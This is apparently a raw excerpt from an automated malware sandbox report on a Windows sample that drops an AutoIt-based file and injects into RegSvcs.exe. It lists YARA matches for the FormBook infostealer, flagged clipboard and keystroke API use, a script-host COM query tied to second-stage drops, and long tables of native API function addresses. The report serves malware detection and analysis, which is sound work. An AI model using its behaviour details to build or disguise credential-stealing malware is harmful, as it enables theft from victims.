                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00EFF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00EFF6C7
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00EFF45C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_00EEA54A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F19ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00F19ED5

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042CCE3 NtClose,14_2_0042CCE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_01462DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_01462C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014635C0 NtCreateMutant,LdrInitializeThunk,14_2_014635C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01464340 NtSetContextThread,14_2_01464340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01464650 NtSuspendThread,14_2_01464650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462B60 NtClose,14_2_01462B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462BE0 NtQueryValueKey,14_2_01462BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462BF0 NtAllocateVirtualMemory,14_2_01462BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462B80 NtQueryInformationFile,14_2_01462B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462BA0 NtEnumerateValueKey,14_2_01462BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462AD0 NtReadFile,14_2_01462AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462AF0 NtWriteFile,14_2_01462AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462AB0 NtWaitForSingleObject,14_2_01462AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462D00 NtSetInformationFile,14_2_01462D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462D10 NtMapViewOfSection,14_2_01462D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462D30 NtUnmapViewOfSection,14_2_01462D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462DD0 NtDelayExecution,14_2_01462DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462DB0 NtEnumerateKey,14_2_01462DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462C60 NtCreateKey,14_2_01462C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462C00 NtQueryInformationProcess,14_2_01462C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462CC0 NtQueryVirtualMemory,14_2_01462CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462CF0 NtOpenProcess,14_2_01462CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462CA0 NtQueryInformationToken,14_2_01462CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462F60 NtCreateProcessEx,14_2_01462F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462F30 NtCreateSection,14_2_01462F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462FE0 NtCreateFile,14_2_01462FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462F90 NtProtectVirtualMemory,14_2_01462F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462FA0 NtQuerySection,14_2_01462FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462FB0 NtResumeThread,14_2_01462FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462E30 NtWriteVirtualMemory,14_2_01462E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462EE0 NtQueueApcThread,14_2_01462EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462E80 NtReadVirtualMemory,14_2_01462E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01462EA0 NtAdjustPrivilegesToken,14_2_01462EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01463010 NtOpenDirectoryObject,14_2_01463010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01463090 NtSetValueKey,14_2_01463090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014639B0 NtGetContextThread,14_2_014639B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01463D70 NtOpenThread,14_2_01463D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01463D10 NtOpenProcessToken,14_2_01463D10
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C99B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00C99B5C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00EE1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_00EEF122
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA355D0_2_00CA355D
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAB76F0_2_00CAB76F
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C9BF3D0_2_00C9BF3D
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CBC0D60_2_00CBC0D6
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAA0080_2_00CAA008
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB92D00_2_00CB92D0
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAC27F0_2_00CAC27F
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA52140_2_00CA5214
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAA2220_2_00CAA222
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC43600_2_00CC4360
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA46CF0_2_00CA46CF
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC86D20_2_00CC86D2
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C948AA0_2_00C948AA
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC480E0_2_00CC480E
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C95AFE0_2_00C95AFE
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CAABC80_2_00CAABC8
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C97CBA0_2_00C97CBA
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CABC050_2_00CABC05
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C93D9D0_2_00C93D9D
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA4D320_2_00CA4D32
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CBBEA70_2_00CBBEA7
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA5F0B0_2_00CA5F0B
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C95F390_2_00C95F39
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121D1208_3_0121D120
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01263D288_3_01263D28
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01263D288_3_01263D28
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121BC698_3_0121BC69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121BC708_3_0121BC70
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628718_3_01262871
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628718_3_01262871
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628788_3_01262878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628788_3_01262878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121C4B08_3_0121C4B0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012630B88_3_012630B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012630B88_3_012630B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121CC808_3_0121CC80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121CC828_3_0121CC82
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0126388A8_3_0126388A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0126388A8_3_0126388A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012638888_3_01263888
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012638888_3_01263888
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121B3E08_3_0121B3E0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01261FE88_3_01261FE8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01261FE88_3_01261FE8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121D1208_3_0121D120
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01263D288_3_01263D28
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01263D288_3_01263D28
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121BC698_3_0121BC69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121BC708_3_0121BC70
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628718_3_01262871
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628718_3_01262871
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628788_3_01262878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012628788_3_01262878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121C4B08_3_0121C4B0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012630B88_3_012630B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012630B88_3_012630B8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121CC808_3_0121CC80
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121CC828_3_0121CC82
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0126388A8_3_0126388A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0126388A8_3_0126388A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012638888_3_01263888
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_012638888_3_01263888
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_0121B3E08_3_0121B3E0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01261FE88_3_01261FE8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_3_01261FE88_3_01261FE8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E9E0BE8_2_00E9E0BE
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA80378_2_00EA8037
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA20078_2_00EA2007
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E8E1A08_2_00E8E1A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA22C28_2_00EA22C2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EBA28E8_2_00EBA28E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E8225D8_2_00E8225D
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E9C59E8_2_00E9C59E
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F0C7A38_2_00F0C7A3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EBE89F8_2_00EBE89F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF291A8_2_00EF291A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EB6AFB8_2_00EB6AFB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE8B278_2_00EE8B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EACE308_2_00EACE30
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F151D28_2_00F151D2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EB71698_2_00EB7169
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E892408_2_00E89240
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E894998_2_00E89499
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA17248_2_00EA1724
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA1A968_2_00EA1A96
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA7BAB8_2_00EA7BAB
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E89B608_2_00E89B60
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA7DDA8_2_00EA7DDA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA1D408_2_00EA1D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00418BF314_2_00418BF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004031C014_2_004031C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042F2C314_2_0042F2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004103E314_2_004103E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040255014_2_00402550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D2014_2_00402D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402D2214_2_00402D22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416DEE14_2_00416DEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416DF314_2_00416DF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041060314_2_00410603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E60314_2_0040E603
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E74714_2_0040E747
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E75314_2_0040E753
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E79C14_2_0040E79C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B815814_2_014B8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142010014_2_01420100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CA11814_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E81CC14_2_014E81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F01AA14_2_014F01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E41A214_2_014E41A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C200014_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EA35214_2_014EA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F03E614_2_014F03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F014_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D027414_2_014D0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B02C014_2_014B02C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143053514_2_01430535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F059114_2_014F0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E244614_2_014E2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D442014_2_014D4420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DE4F614_2_014DE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145475014_2_01454750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143077014_2_01430770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142C7C014_2_0142C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144C6E014_2_0144C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144696214_2_01446962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A014_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014FA9A614_2_014FA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143A84014_2_0143A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143284014_2_01432840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145E8F014_2_0145E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014168B814_2_014168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EAB4014_2_014EAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E6BD714_2_014E6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142EA8014_2_0142EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143AD0014_2_0143AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CCD1F14_2_014CCD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142ADE014_2_0142ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01448DBF14_2_01448DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430C0014_2_01430C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420CF214_2_01420CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D0CB514_2_014D0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A4F4014_2_014A4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01472F2814_2_01472F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01450F3014_2_01450F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D2F3014_2_014D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422FC814_2_01422FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143CFE014_2_0143CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AEFA014_2_014AEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430E5914_2_01430E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EEE2614_2_014EEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EEEDB14_2_014EEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442E9014_2_01442E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014ECE9314_2_014ECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014FB16B14_2_014FB16B
